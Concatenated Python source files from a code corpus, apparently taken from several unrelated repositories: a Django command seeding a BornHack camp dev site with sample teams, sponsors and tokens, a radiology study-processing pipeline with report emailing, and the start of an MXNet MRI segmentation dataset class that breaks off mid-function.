autoschedule = scheduler.calculate_autoschedule()
if autoschedule:
scheduler.apply(autoschedule)
except ValueError as E:
self.output(f"Got exception while calculating autoschedule: {E}")
scheduleduration = timezone.now() - schedulestart
self.output(
f"Done running autoscheduler for {year}... It took {scheduleduration}"
)
def create_camp_speaker_event_conflicts(self, camp):
year = camp.camp.lower.year
self.output(
"Generating event_conflicts for SpeakerProposals for {}...".format(year)
)
# loop over all
for sp in camp.speaker_proposals.all():
# not all speakers add conflicts
if random.choice([True, True, False]):
# pick 0-10 events this speaker wants to attend
conflictcount = random.randint(0, 10)
sp.event_conflicts.set(
Event.objects.filter(
track__camp=camp,
event_type__support_speaker_event_conflicts=True,
).order_by("?")[0:conflictcount]
)
def create_camp_rescheduling(self, camp):
year = camp.camp.lower.year
# reapprove all speaker_proposals so the new availability takes effect
for prop in camp.speaker_proposals.filter(proposal_status="approved"):
prop.mark_as_approved()
# exercise the autoscheduler a bit
self.output("Rescheduling {}...".format(year))
scheduler = AutoScheduler(camp=camp)
schedulestart = timezone.now()
try:
autoschedule, diff = scheduler.calculate_similar_autoschedule()
scheduler.apply(autoschedule)
except ValueError as E:
self.output(f"Got exception while calculating similar autoschedule: {E}")
autoschedule = None
scheduleduration = timezone.now() - schedulestart
self.output(f"Done rescheduling for {year}... It took {scheduleduration}.")
def create_camp_villages(self, camp, users):
year = camp.camp.lower.year
self.output("Creating villages for {}...".format(year))
Village.objects.create(
contact=users[1],
camp=camp,
name="Baconsvin",
slug="baconsvin",
description="The camp with the doorbell-pig! Baconsvin is a group of happy people from Denmark doing a lot of open source, and are always happy to talk about infosec, hacking, BSD, and much more. A lot of the organizers of BornHack live in Baconsvin village. Come by and squeeze the pig and sign our guestbook!",
)
Village.objects.create(
contact=users[2],
camp=camp,
name="NetworkWarriors",
slug="networkwarriors",
description="We will have a tent which house the NOC people, various lab equipment people can play with, and have fun. If you want to talk about networking, come by, and if you have trouble with the Bornhack network contact us.",
)
Village.objects.create(
contact=users[3],
camp=camp,
name="TheCamp.dk",
slug="the-camp",
description="This village is representing TheCamp.dk, an annual danish tech camp held in July. The official subjects for this event is open source software, network and security. In reality we are interested in anything from computers to illumination soap bubbles and irish coffee",
)
def create_camp_teams(self, camp):
teams = {}
year = camp.camp.lower.year
self.output("Creating teams for {}...".format(year))
teams["orga"] = Team.objects.create(
name="Orga",
description="The Orga team are the main organisers. All tasks are Orga responsibility until they are delegated to another team",
camp=camp,
needs_members=False,
permission_set="orgateam_permission",
)
teams["noc"] = Team.objects.create(
name="NOC",
description="The NOC team is in charge of establishing and running a network onsite.",
camp=camp,
permission_set="nocteam_permission",
)
teams["bar"] = Team.objects.create(
name="Bar",
description="The Bar team plans, builds and run the IRL bar!",
camp=camp,
permission_set="barteam_permission",
)
teams["shuttle"] = Team.objects.create(
name="Shuttle",
description="The shuttle team drives people to and from the trainstation or the supermarket",
camp=camp,
permission_set="shuttleteam_permission",
)
teams["power"] = Team.objects.create(
name="Power",
description="The power team makes sure we have power all over the venue",
camp=camp,
permission_set="powerteam_permission",
)
teams["shit"] = Team.objects.create(
name="Sanitation",
description="Team shit takes care of the toilets",
camp=camp,
permission_set="sanitationteam_permission",
)
teams["content"] = Team.objects.create(
name="Content",
description="The Content Team handles stuff on the program",
camp=camp,
mailing_list="<EMAIL>",
permission_set="contentteam_permission",
)
return teams
def create_camp_team_tasks(self, camp, teams):
year = camp.camp.lower.year
self.output("Creating TeamTasks for {}...".format(year))
TeamTask.objects.create(
team=teams["noc"],
name="Setup private networks",
description="All the private networks need to be setup",
)
TeamTask.objects.create(
team=teams["noc"],
name="Setup public networks",
description="All the public networks need to be setup",
)
TeamTask.objects.create(
team=teams["noc"],
name="Deploy access points",
description="All access points need to be deployed",
)
TeamTask.objects.create(
team=teams["noc"],
name="Deploy fiber cables",
description="We need the fiber deployed where necessary",
)
TeamTask.objects.create(
team=teams["bar"],
name="List of booze",
description="A list of the different booze we need to have in the bar durng bornhack",
)
TeamTask.objects.create(
team=teams["bar"],
name="Chairs",
description="We need a solution for chairs",
)
TeamTask.objects.create(
team=teams["bar"], name="Taps", description="Taps must be ordered"
)
TeamTask.objects.create(
team=teams["bar"],
name="Coffee",
description="We need to get some coffee for our coffee machine",
)
TeamTask.objects.create(
team=teams["bar"],
name="Ice",
description="We need ice cubes and crushed ice in the bar",
)
def create_camp_team_memberships(self, camp, teams, users):
memberships = {}
year = camp.camp.lower.year
self.output("Creating team memberships for {}...".format(year))
# noc team
memberships["noc"] = {}
memberships["noc"]["user4"] = TeamMember.objects.create(
team=teams["noc"], user=users[4], approved=True, responsible=True
)
memberships["noc"]["user1"] = TeamMember.objects.create(
team=teams["noc"], user=users[1], approved=True
)
memberships["noc"]["user5"] = TeamMember.objects.create(
team=teams["noc"], user=users[5], approved=True
)
memberships["noc"]["user2"] = TeamMember.objects.create(
team=teams["noc"], user=users[2]
)
# bar team
memberships["bar"] = {}
memberships["bar"]["user1"] = TeamMember.objects.create(
team=teams["bar"], user=users[1], approved=True, responsible=True
)
memberships["bar"]["user3"] = TeamMember.objects.create(
team=teams["bar"], user=users[3], approved=True, responsible=True
)
memberships["bar"]["user2"] = TeamMember.objects.create(
team=teams["bar"], user=users[2], approved=True
)
memberships["bar"]["user7"] = TeamMember.objects.create(
team=teams["bar"], user=users[7], approved=True
)
memberships["bar"]["user8"] = TeamMember.objects.create(
team=teams["bar"], user=users[8]
)
# orga team
memberships["orga"] = {}
memberships["orga"]["user1"] = TeamMember.objects.create(
team=teams["orga"], user=users[1], approved=True, responsible=True
)
memberships["orga"]["user3"] = TeamMember.objects.create(
team=teams["orga"], user=users[3], approved=True, responsible=True
)
memberships["orga"]["user8"] = TeamMember.objects.create(
team=teams["orga"], user=users[8], approved=True, responsible=True
)
memberships["orga"]["user9"] = TeamMember.objects.create(
team=teams["orga"], user=users[9], approved=True, responsible=True
)
memberships["orga"]["user4"] = TeamMember.objects.create(
team=teams["orga"], user=users[4], approved=True, responsible=True
)
# shuttle team
memberships["shuttle"] = {}
memberships["shuttle"]["user7"] = TeamMember.objects.create(
team=teams["shuttle"], user=users[7], approved=True, responsible=True
)
memberships["shuttle"]["user3"] = TeamMember.objects.create(
team=teams["shuttle"], user=users[3], approved=True
)
memberships["shuttle"]["user9"] = TeamMember.objects.create(
team=teams["shuttle"], user=users[9]
)
return memberships
def create_camp_team_shifts(self, camp, teams, team_memberships):
shifts = {}
year = camp.camp.lower.year
self.output("Creating team shifts for {}...".format(year))
shifts[0] = TeamShift.objects.create(
team=teams["shuttle"],
shift_range=(
tz.localize(datetime(year, 8, 27, 2, 0)),
tz.localize(datetime(year, 8, 27, 8, 0)),
),
people_required=1,
)
shifts[0].team_members.add(team_memberships["shuttle"]["user7"])
shifts[1] = TeamShift.objects.create(
team=teams["shuttle"],
shift_range=(
tz.localize(datetime(year, 8, 27, 8, 0)),
tz.localize(datetime(year, 8, 27, 14, 0)),
),
people_required=1,
)
shifts[2] = TeamShift.objects.create(
team=teams["shuttle"],
shift_range=(
tz.localize(datetime(year, 8, 27, 14, 0)),
tz.localize(datetime(year, 8, 27, 20, 0)),
),
people_required=1,
)
def create_camp_info_categories(self, camp, teams):
categories = {}
year = camp.camp.lower.year
self.output("Creating infocategories for {}...".format(year))
categories["when"] = InfoCategory.objects.create(
team=teams["orga"], headline="When is BornHack happening?", anchor="when"
)
categories["travel"] = InfoCategory.objects.create(
team=teams["orga"], headline="Travel Information", anchor="travel"
)
categories["sleep"] = InfoCategory.objects.create(
team=teams["orga"], headline="Where do I sleep?", anchor="sleep"
)
return categories
def create_camp_info_items(self, camp, categories):
year = camp.camp.lower.year
self.output("Creating infoitems for {}...".format(year))
InfoItem.objects.create(
category=categories["when"],
headline="Opening",
anchor="opening",
body="BornHack {} starts saturday, august 27th, at noon (12:00). It will be possible to access the venue before noon if for example you arrive early in the morning with the ferry. But please dont expect everything to be ready before noon :)".format(
year
),
)
InfoItem.objects.create(
category=categories["when"],
headline="Closing",
anchor="closing",
body="BornHack {} ends saturday, september 3rd, at noon (12:00). Rented village tents must be empty and cleaned at this time, ready to take down. Participants must leave the site no later than 17:00 on the closing day (or stay and help us clean up).".format(
year
),
)
InfoItem.objects.create(
category=categories["travel"],
headline="Public Transportation",
anchor="public-transportation",
body=output_fake_md_description(),
)
InfoItem.objects.create(
category=categories["travel"],
headline="Bus to and from BornHack",
anchor="bus-to-and-from-bornhack",
body="PROSA, the union of IT-professionals in Denmark, has set up a great deal for BornHack attendees travelling from Copenhagen to BornHack. For only 125kr, about 17 euros, you can be transported to the camp on opening day, and back to Copenhagen at the end of the camp!",
)
InfoItem.objects.create(
category=categories["when"],
headline="Driving and Parking",
anchor="driving-and-parking",
body=output_fake_md_description(),
)
InfoItem.objects.create(
category=categories["sleep"],
headline="Camping",
anchor="camping",
body="BornHack is first and foremost a tent camp. You need to bring a tent to sleep in. Most people go with some friends and make a camp somewhere at the venue. See also the section on Villages - you might be able to find some likeminded people to camp with.",
)
InfoItem.objects.create(
category=categories["sleep"],
headline="Cabins",
anchor="cabins",
body="We rent out a few cabins at the venue with 8 beds each for people who don't want to sleep in tents for some reason. A tent is the cheapest sleeping option (you just need a ticket), but the cabins are there if you want them.",
)
def create_camp_feedback(self, camp, users):
year = camp.camp.lower.year
self.output("Creating feedback for {}...".format(year))
Feedback.objects.create(
camp=camp, user=users[1], feedback="Awesome event, will be back next year"
)
Feedback.objects.create(
camp=camp,
user=users[3],
feedback="Very nice, though a bit more hot water would be awesome",
)
Feedback.objects.create(
camp=camp, user=users[5], feedback="Is there a token here?"
)
Feedback.objects.create(
camp=camp, user=users[9], feedback="That was fun. Thanks!"
)
def create_camp_rides(self, camp, users):
year = camp.camp.lower.year
self.output("Creating rides for {}...".format(year))
Ride.objects.create(
camp=camp,
user=users[1],
seats=2,
from_location="Copenhagen",
to_location="BornHack",
when=tz.localize(datetime(year, 8, 27, 12, 0)),
description="I have space for two people and a little bit of luggage",
)
Ride.objects.create(
camp=camp,
user=users[1],
seats=2,
from_location="BornHack",
to_location="Copenhagen",
when=tz.localize(datetime(year, 9, 4, 12, 0)),
description="I have space for two people and a little bit of luggage",
)
Ride.objects.create(
camp=camp,
user=users[4],
seats=1,
from_location="Aarhus",
to_location="BornHack",
when=tz.localize(datetime(year, 8, 27, 12, 0)),
description="I need a ride and have a large backpack",
)
def create_camp_cfp(self, camp):
year = camp.camp.lower.year
self.output("Creating CFP for {}...".format(year))
camp.call_for_participation_open = True
camp.call_for_participation = "Please give a talk at Bornhack {}...".format(
year
)
camp.save()
def create_camp_cfs(self, camp):
year = camp.camp.lower.year
self.output("Creating CFS for {}...".format(year))
camp.call_for_sponsors_open = True
camp.call_for_sponsors = "Please give us ALL the money so that we can make Bornhack {} the best ever!".format(
year
)
camp.save()
def create_camp_sponsor_tiers(self, camp):
tiers = {}
year = camp.camp.lower.year
self.output("Creating sponsor tiers for {}...".format(year))
tiers["platinum"] = SponsorTier.objects.create(
name="Platinum sponsors",
description="- 10 tickets\n- logo on website\n- physical banner in the speaker's tent\n- thanks from the podium\n- recruitment area\n- sponsor meeting with organizers\n- promoted HackMe\n- sponsored social event",
camp=camp,
weight=0,
tickets=10,
)
tiers["gold"] = SponsorTier.objects.create(
name="Gold sponsors",
description="- 10 tickets\n- logo on website\n- physical banner in the speaker's tent\n- thanks from the podium\n- recruitment area\n- sponsor meeting with organizers\n- promoted HackMe",
camp=camp,
weight=1,
tickets=10,
)
tiers["silver"] = SponsorTier.objects.create(
name="Silver sponsors",
description="- 5 tickets\n- logo on website\n- physical banner in the speaker's tent\n- thanks from the podium\n- recruitment area\n- sponsor meeting with organizers",
camp=camp,
weight=2,
tickets=5,
)
tiers["sponsor"] = SponsorTier.objects.create(
name="Sponsors",
description="- 2 tickets\n- logo on website\n- physical banner in the speaker's tent\n- thanks from the podium\n- recruitment area",
camp=camp,
weight=3,
tickets=2,
)
return tiers
def create_camp_sponsors(self, camp, tiers):
year = camp.camp.lower.year
self.output("Creating sponsors for {}...".format(year))
Sponsor.objects.create(
name="PROSA",
tier=tiers["platinum"],
description="Bus Trip",
logo_filename="PROSA-logo.png",
url="https://www.prosa.dk",
)
Sponsor.objects.create(
name="DKUUG",
tier=tiers["platinum"],
description="Speakers tent",
logo_filename="DKUUGlogo.jpeg",
url="http://www.dkuug.dk/",
)
Sponsor.objects.create(
name="LetsGo",
tier=tiers["silver"],
description="Shuttle",
logo_filename="letsgo.png",
url="https://letsgo.dk",
)
Sponsor.objects.create(
name="<NAME>",
tier=tiers["gold"],
description="Cash Sponsorship",
logo_filename="saxobank.png",
url="https://home.saxo",
)
Sponsor.objects.create(
name="CSIS",
tier=tiers["sponsor"],
description="Cash Sponsorship",
logo_filename="CSIS_PRI_LOGO_TURQUOISE_RGB.jpg",
url="https://csis.dk",
)
def create_camp_tokens(self, camp):
tokens = {}
year = camp.camp.lower.year
self.output("Creating tokens for {}...".format(year))
tokens[0] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Physical",
description="Token in the back of the speakers tent (in binary)",
)
tokens[1] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Internet",
description="Twitter",
)
tokens[2] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Website",
description="Token hidden in the X-Secret-Token HTTP header on the BornHack website",
)
tokens[3] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Physical",
description="Token in infodesk (QR code)",
)
tokens[4] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Physical",
description="Token on the back of the BornHack {} badge".format(year),
)
tokens[5] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Website",
description="Token hidden in EXIF data in the logo posted on the website sunday",
)
return tokens
def create_camp_token_finds(self, camp, tokens, users):
year = camp.camp.lower.year
self.output("Creating token finds for {}...".format(year))
TokenFind.objects.create(token=tokens[3], user=users[4])
TokenFind.objects.create(token=tokens[5], user=users[4])
TokenFind.objects.create(token=tokens[2], user=users[7])
TokenFind.objects.create(token=tokens[1], user=users[3])
TokenFind.objects.create(token=tokens[4], user=users[2])
TokenFind.objects.create(token=tokens[5], user=users[6])
for i in range(0, 6):
TokenFind.objects.create(token=tokens[i], user=users[1])
def output(self, message):
self.stdout.write(
"%s: %s" % (timezone.now().strftime("%Y-%m-%d %H:%M:%S"), message)
)
def handle(self, *args, **options):
start = timezone.now()
self.output(
self.style.SUCCESS("----------[ Running bootstrap-devsite ]----------")
)
self.output(self.style.SUCCESS("----------[ Global stuff ]----------"))
camps = self.create_camps()
self.create_event_routing_types()
users = self.create_users()
self.create_news()
event_types = self.create_event_types()
self.create_url_types()
product_categories = self.create_product_categories()
global_products = self.create_global_products(product_categories)
quickfeedback_options = self.create_quickfeedback_options()
for (camp, read_only) in camps:
year = camp.camp.lower.year
self.output(
self.style.SUCCESS("----------[ Bornhack {} ]----------".format(year))
)
if year < 2021:
ticket_types = self.create_camp_ticket_types(camp)
camp_products = self.create_camp_products(
camp, product_categories, ticket_types
)
self.create_orders(users, global_products, camp_products)
self.create_camp_tracks(camp)
locations = self.create_event_locations(camp)
self.create_camp_news(camp)
teams = self.create_camp_teams(camp)
self.create_camp_team_tasks(camp, teams)
team_memberships = self.create_camp_team_memberships(camp, teams, users)
self.create_camp_team_shifts(camp, teams, team_memberships)
self.create_camp_cfp(camp)
self.create_camp_proposals(camp, event_types)
self.create_proposal_urls(camp)
self.create_camp_event_sessions(camp, event_types, locations)
self.generate_speaker_availability(camp)
try:
self.approve_speaker_proposals(camp)
except ValidationError:
self.output(
"Name collision, bad luck. Run 'manage.py flush' and run the bootstrap script again!"
)
sys.exit(1)
self.approve_event_proposals(camp)
self.create_camp_scheduling(camp)
# shuffle it up - delete and create new random availability
self.generate_speaker_availability(camp)
# and create some speaker<>event conflicts
self.create_camp_speaker_event_conflicts(camp)
# recalculate the autoschedule
self.create_camp_rescheduling(camp)
self.create_camp_villages(camp, users)
facility_types = self.create_facility_types(
camp, teams, quickfeedback_options
)
facilities = self.create_facilities(facility_types)
self.create_facility_feedbacks(facilities, quickfeedback_options, users)
info_categories = self.create_camp_info_categories(camp, teams)
self.create_camp_info_items(camp, info_categories)
self.create_camp_feedback(camp, users)
self.create_camp_rides(camp, users)
self.create_camp_cfs(camp)
sponsor_tiers = self.create_camp_sponsor_tiers(camp)
self.create_camp_sponsors(camp, sponsor_tiers)
tokens = self.create_camp_tokens(camp)
self.create_camp_token_finds(camp, tokens, users)
else:
self.output("Not creating anything for this year yet")
camp.read_only = read_only
camp.call_for_participation_open = not read_only
camp.call_for_sponsors_open = not read_only
camp.save()
self.output("----------[ Finishing up ]----------")
self.output("Adding event routing...")
Routing.objects.create(
team=teams["orga"],
eventtype=Type.objects.get(name="public_credit_name_changed"),
)
Routing.objects.create(
team=teams["orga"], eventtype=Type.objects.get(name="ticket_created")
)
self.output("done!")
duration = timezone.now() - start
self.output(f"bootstrap-devsite took {duration}!")
``` |
{
"source": "johncolby/rad_apps",
"score": 2
} |
#### File: rad_apps/rad_apps/tasks.py
```python
import os
from rad_apps import app, app_list
from .email import send_email
def app_wrapper(app_name, form):
rad_app = app_list.apps[app_name]
rad_app.wrapper_fun(app, form)
if form['email']:
report_name = f'{form["acc"]}_{app_name}.pdf'
output_dir = os.path.join(app.config['OUTPUT_DIR_NODE'], app_name)
report_path = os.path.join(output_dir, form["acc"], f'{app_name}.pdf')
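        # Assumption: this runs in a background worker outside the request cycle,
        # so an application context is pushed to let send_email() reach the app
        # config (mail settings) and extensions.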
app.app_context().push()
        with open(report_path, 'rb') as fp:
send_email(subject=f'secure: {rad_app.long_name} analysis report',
sender=app.config['MAIL_USERNAME'],
recipients=[form['email']],
text_body=f'Accession #: {form["acc"]}\n\n',
attachments=[(report_name, 'application/pdf', fp.read())])
```
#### File: johncolby/rad_apps/radstudy.py
```python
import air_download.air_download as air
import argparse
import glob
import logging
import os
import pandas as pd
import pydicom
import shutil
import tempfile
import zipfile
from datetime import datetime
import rpy2.robjects as ro
from rpy2.robjects import pandas2ri
pandas2ri.activate()
class RadStudy():
def __init__(self, acc='', zip_path='', model_path='', download_url='',
cred_path='', process_url='', output_dir=''):
self.zip_path = zip_path
self.model_path = model_path
self.dir_tmp = ''
self.dir_study = ''
self.channels = []
self.series_picks = pd.DataFrame()
self.acc = acc
self.hdr = ''
self.series = None
self.study_date = ''
self.app_name = ''
self.download_url = download_url
self.cred_path = cred_path
self.process_url = process_url
self.output_dir = output_dir
# assert self.acc or self.zip_path, 'No input study provided.'
def process(self):
raise NotImplementedError
def download(self):
"""Download study via AIR API"""
assert not self.zip_path, '.zip path already available.'
assert self.dir_tmp, 'Working area not setup yet.'
args = argparse.Namespace()
args.URL = self.download_url
args.acc = self.acc
args.cred_path = self.cred_path
args.profile = -1
args.output = os.path.join(self.dir_tmp, f'{self.acc}.zip')
air.main(args)
self.zip_path = args.output
self._extract()
self.setup()
def _extract(self):
"""Extract study archive"""
assert not self.dir_study, 'dir_study already exists.'
dir_study = os.path.join(self.dir_tmp, 'dcm')
os.mkdir(dir_study)
zip_ref = zipfile.ZipFile(self.zip_path, 'r')
zip_ref.extractall(path=dir_study)
self.dir_study = os.path.join(dir_study, os.listdir(dir_study)[0])
def setup(self):
"""Setup study for processing"""
# Create table of series picks
if self.series_picks.empty:
self.series_picks = pd.DataFrame({'class': self.channels,
'prob': '',
'SeriesNumber': '',
'series': ''})
# Create temporary working directory
if not self.dir_tmp:
self.dir_tmp = tempfile.mkdtemp()
os.mkdir(os.path.join(self.dir_tmp, 'nii'))
os.mkdir(os.path.join(self.dir_tmp, 'output'))
# Extract study archive
if not self.dir_study and self.zip_path:
self._extract()
# Load representative DICOM headers
if self.dir_study and not self.hdr:
series_paths = glob.glob(f'{self.dir_study}/*')
series_numbers = [self._get_series_number(series_path) for series_path in series_paths]
self.series = pd.DataFrame({'SeriesNumber': series_numbers, 'path': series_paths})
dcm_path = glob.glob(f'{self.dir_study}/*/*.dcm', recursive=True)[0]
self.hdr = pydicom.read_file(dcm_path)
self.acc = self.hdr.AccessionNumber
self.study_date = datetime.strptime(self.hdr.StudyDate, '%Y%m%d').strftime('%m/%d/%Y')
def classify_series(self):
"""Classify series into modalities"""
ro.r['library']('dcmclass')
ro.r['load'](self.model_path)
self.series_picks = ro.r['predict_headers'](os.path.dirname(self.dir_study), ro.r['models'], ro.r['tb_preproc'])
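        # pandas2ri.activate() at import time means the R data.frame returned by
        # predict_headers() arrives here as a pandas DataFrame.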
paths = [os.path.abspath(os.path.join(self.dir_study, series)) for series in self.series_picks.series.tolist()]
self.series_picks['series'] = paths
def add_paths(self, paths):
"""Manually specify directory paths to required series"""
self.series_picks.series = paths
def _get_series_number(self, series_path):
dcm_path = glob.glob(f'{series_path}/*')[0]
return pydicom.read_file(dcm_path).SeriesNumber
def series_to_path(self, series):
"""Convert a SeriesNumber to path"""
return self.series.loc[self.series['SeriesNumber'] == series, 'path'].values[0]
def report(self):
"""Generate PDF report"""
ro.r['library']('ucsfreports')
params = ro.ListVector({'input_path': self.dir_tmp,
'patient_name': self.hdr.PatientName.family_comma_given(),
'patient_MRN': self.hdr.PatientID,
'patient_acc': self.hdr.AccessionNumber,
'study_date': self.study_date})
ro.r['ucsf_report'](self.app_name, output_dir=os.path.join(self.dir_tmp, 'output'), params=params)
def copy_results(self, output_dir='.'):
src = os.path.join(self.dir_tmp, 'output')
dest = os.path.join(self.output_dir, self.acc)
assert not os.path.exists(dest), 'Output directory already exists.'
shutil.copytree(src, dest)
def __str__(self):
s_picks = str(self.series_picks.iloc[:, 0:3]) if not self.series_picks.empty else ''
s = ('Radiology study object\n'
f' Accession #: {self.acc}\n'
f' dir_tmp: {self.dir_tmp}\n'
f' Series picks:\n{s_picks}')
return s
def rm_tmp(self):
"""Remove temporary working area"""
if not self.dir_tmp == '':
shutil.rmtree(self.dir_tmp)
else:
print('Nothing to remove.')
def run(self):
try:
self.setup()
self.download()
self.process()
self.report()
self.copy_results()
self.rm_tmp()
        except Exception:
logging.exception('Processing failed.')
self.rm_tmp()
```
#### File: johncolby/rad_apps/testapp.py
```python
from flask_wtf import FlaskForm
import os
from urllib.parse import urljoin
from rad_apps.appplugin import AppPlugin
from radstudy import RadStudy
class Options(FlaskForm):
def __init__(self, csrf_enabled=False, *args, **kwargs):
super(Options, self).__init__(csrf_enabled=csrf_enabled, *args, **kwargs)
class TestStudy(RadStudy):
def download(self):
pass
def process(self):
pass
def report(self):
report_path = os.path.join(self.dir_tmp, 'output', 'test.pdf')
with open(report_path, 'w') as fh:
print(f'Accession: {self.acc}', file=fh)
def wrapper_fun(app, form):
TestStudy(acc = form['acc'],
# download_url = app.config['AIR_URL'],
# cred_path = app.config['DOTENV_FILE'],
# process_url = urljoin(app.config['SEG_URL'], 'test'),
output_dir = os.path.join(app.config['OUTPUT_DIR_NODE'], 'test')
).run()
app = AppPlugin(long_name = 'Test application',
short_name = 'test',
form_opts = Options,
wrapper_fun = wrapper_fun)
``` |
{
"source": "johncolby/rsna_heme",
"score": 2
} |
#### File: rsna_heme/rsna_heme/cnn.py
```python
import gluoncv
import mxnet as mx
from mxnet import nd, autograd, gluon
def get_model(args):
net = gluoncv.model_zoo.get_model(args.model_name, pretrained = args.pretrained)
with net.name_scope():
if hasattr(net, 'fc'):
output_name = 'fc'
elif hasattr(net, 'output'):
output_name = 'output'
setattr(net, output_name, mx.gluon.nn.Dense(args.classes))
if hasattr(args, 'params_path'):
net.load_parameters(args.params_path)
elif args.pretrained is True:
getattr(net, output_name).initialize(mx.init.Xavier(), ctx = args.ctx)
else:
net.initialize(mx.init.Xavier(), ctx = args.ctx)
net.collect_params().reset_ctx(args.ctx)
net.hybridize()
return net
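# Hedged usage sketch (argument values are illustrative assumptions, not taken from
# this repo's training script):
#   import argparse
#   args = argparse.Namespace(model_name='resnet50_v2', pretrained=True,
#                             classes=6, ctx=[mx.cpu()])
#   net = get_model(args)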
def forward_pass(net, loss_fcn, data, labels, weights):
outputs = [net(X) for X in data]
losses = [loss_fcn(yhat, y, w) for yhat, y, w in zip(outputs, labels, weights)]
return [outputs, losses]
def process_data(net, loss_fcn, dataloader, ctx, trainer=None):
metric_loss = mx.metric.Loss()
metric_acc = mx.metric.Accuracy()
for i, batch in enumerate(dataloader):
weights = nd.ones_like(batch[1]) * nd.array([2, 1, 1, 1, 1, 1])
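        # assumption: column 0 is the "any" label, upweighted 2x relative to the
        # five hemorrhage subtype columns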
weights = gluon.utils.split_and_load(weights, ctx_list=ctx, batch_axis=0, even_split=False)
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
labels = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
if trainer is not None:
with autograd.record():
[outputs, losses] = forward_pass(net, loss_fcn, data, labels, weights)
for l in losses:
l.backward()
trainer.step(len(batch[0]))
else:
[outputs, losses] = forward_pass(net, loss_fcn, data, labels, weights)
metric_loss.update(labels, losses)
metric_acc.update([l[:,0] for l in labels], [(nd.sign(o[:,0]) + 1) / 2 for o in outputs])
        if dataloader.__class__.__name__ == 'tqdm' and (i < (len(dataloader) - 1)):
dataloader.set_description(f'loss {metric_loss.get()[1]:.4f}')
_, loss = metric_loss.get()
_, acc = metric_acc.get()
return [loss, acc]
```
#### File: rsna_heme/rsna_heme/io.py
```python
import mxnet as mx
import numpy as np
import os
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from tqdm import tqdm
from . import dicom
from . import labels
from . import logger
def pack_rec(base_dir, stage, mode, wl, out_dir = None):
    if out_dir is None:
out_dir = base_dir
name_str = f'stage_{stage}_{mode}'
log = logger.Logger(out_dir, name_str)
log.log(locals())
dcm_dir = os.path.join(base_dir, f'{name_str}_images')
# Load class labels
if mode == 'train':
df = labels.read_labels(base_dir)
elif mode == 'test':
df = labels.ids_from_dir(dcm_dir)
# Open recordIO file for writing
if not os.path.exists(out_dir):
os.makedirs(out_dir)
rec_path = os.path.join(out_dir, name_str + '.rec')
idx_path = os.path.join(out_dir, name_str + '.idx')
record = mx.recordio.MXIndexedRecordIO(idx_path, rec_path, 'w')
# Loop over subjects
for i, (ID, row) in enumerate(tqdm(df.iterrows(), total=len(df))):
# Get DICOM path
dcm_name = ID + '.dcm'
dcm_path = os.path.join(dcm_dir, dcm_name)
# Load DICOM and extract image data
dcm = dicom.Dicom(dcm_path)
# img = dcm.img_for_plot(center = center, width = width)
img = dcm.img_for_plot3(wl)
# Generate recordIO header
if mode == 'train':
col_names = labels.heme_types
label = row[col_names].array
else:
label = 0
header = mx.recordio.IRHeader(0, label, i, 0)
# Pack data into binary recordIO format as compressed jpg
img_packed = mx.recordio.pack_img(header, img, quality=100)
# Append record to recordIO file
record.write_idx(i, img_packed)
record.close()
log.close()
class CVSampler(mx.gluon.data.sampler.Sampler):
def __init__(self, groups, n_splits, i_fold, mode = 'train', shuffle = True, seed = 1):
self.n_splits = n_splits
self.seed = seed
self.groups = groups
self.folds = self.get_folds()
self._indices = self.folds[i_fold][mode]
self._shuffle = shuffle
self._length = len(self._indices)
def __iter__(self):
if self._shuffle:
np.random.shuffle(self._indices)
return iter(self._indices)
def __len__(self):
return self._length
def get_folds(self):
skf = StratifiedKFold(n_splits = self.n_splits, shuffle = True, random_state = self.seed)
folds = [{'train': tr, 'test': te} for tr, te in skf.split(X = np.zeros(len(self.groups)), y = self.groups)]
return folds
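# Hedged usage sketch (dataset/label names are assumptions): the sampler plugs into a
# gluon DataLoader in place of shuffle, yielding only the indices of the chosen fold.
#   sampler = CVSampler(groups=labels_df['any'], n_splits=5, i_fold=0, mode='train')
#   loader = mx.gluon.data.DataLoader(dataset, batch_size=32, sampler=sampler)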
def save_params(net, best_metric, current_metric, epoch, save_interval, prefix):
"""Logic for if/when to save/checkpoint model parameters"""
if current_metric < best_metric:
best_metric = current_metric
        net.save_parameters('{:s}_best.params'.format(prefix))
with open(prefix+'_best.log', 'a') as f:
f.write('\n{:04d}:\t{:.4f}'.format(epoch, current_metric))
if save_interval and (epoch + 1) % save_interval == 0:
net.save_parameters('{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_metric))
return best_metric
``` |
{
"source": "johncolby/svid_paper",
"score": 2
} |
#### File: johncolby/svid_paper/unet.py
```python
import os
import logging
from mxboard import SummaryWriter
import glob
import itertools
import numpy as np
import nibabel as nib
import mxnet as mx
from mxnet import gluon, autograd, ndarray as nd
from mxnet.gluon.nn import Activation, Conv3D, Conv3DTranspose, \
BatchNorm, HybridSequential, HybridBlock, Dropout, MaxPool3D
import gluoncv
from gluoncv.data.segbase import SegmentationDataset
from scipy.ndimage import affine_transform
from math import pi
from transforms3d import affines, euler
################################################################################
# MRI segmentation dataset
class MRISegDataset(SegmentationDataset):
"""Semantic segmentation directory dataset class for MRI volumetric data"""
NUM_CLASS = 4
def __init__(self, root, split='train', fold_inds=None, mode=None,
transform=None, means=None, stds=None, lesion_frac=0.9, warp_params=None, **kwargs):
super(MRISegDataset, self).__init__(root, split, mode, transform, warp_params, **kwargs)
self.fold_inds = fold_inds
self.means = means
self.stds = stds
self.lesion_frac = lesion_frac
self.warp_params = warp_params
# Get input file path lists
if split == 'train':
#import pdb; pdb.set_trace()
self._dataset_root = os.path.join(root, 'training')
self.sub_dirs = glob.glob(self._dataset_root + '/*/*/')
if fold_inds is not None:
                mask = np.ones(len(self.sub_dirs), bool)
mask[fold_inds] = 0
ikeep = np.arange(0, len(self.sub_dirs))[mask]
self.sub_dirs = np.array(self.sub_dirs)[ikeep]
if self.means is not None: self.means = self.means[ikeep]
if self.stds is not None: self.stds = self.stds[ikeep]
elif split == 'val':
self._dataset_root = os.path.join(root, 'training')
self.sub_dirs = glob.glob(self._dataset_root + '/*/*/')
if fold_inds is not None:
